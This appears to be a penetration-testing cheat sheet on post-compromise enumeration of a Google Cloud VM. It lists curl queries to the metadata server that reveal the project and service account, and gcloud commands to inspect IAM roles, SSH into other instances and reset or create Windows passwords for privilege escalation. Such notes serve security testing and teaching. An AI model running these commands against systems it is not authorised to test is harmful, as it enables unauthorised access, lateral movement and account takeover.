Once we were able to compromise a GCP VM Instance we can attempt enumerate the environment. Most the attacks will use the built-in by default gcloud utility and the metadata server at metadata.google.internal(169.254.169.254).

Basic enumeration

Check project name:

PROJECT=$(curl <http://metadata.google.internal/computeMetadata/v1/project/project-id> -H "Metadata-Flavor: Google" -s)

Check account name:

ACCOUNT=$(curl <http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email> -H "Metadata-Flavor: Google" -s)

Enumerate scope

curl <http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes> -H 'Metadata-Flavor:Google'

• If you get only ‘cloud-platform’ scope - it means it allow to authenticate to any API function and leverage the full power of our assigned IAM permissions.

Enumerate service account role

gcloud projects get-iam-policy $PROJECT --flatten="bindings[].members" --format='table(bindings.role)' --filter="bindings.members:$ACCOUNT"

The editor role is the default one associated with service accounts, and it allows to privesc.

This can be done by sshing into the machine

List instances

gcloud compute instances list

SSH into instance

gcloud compute ssh $INSTANCENAME

For windows

gcloud compute reset-windows-password <INSTANCE-NAME> --user=<USERNAME>

This command will create the user if it account does not exist, otherwise, it will reset its password.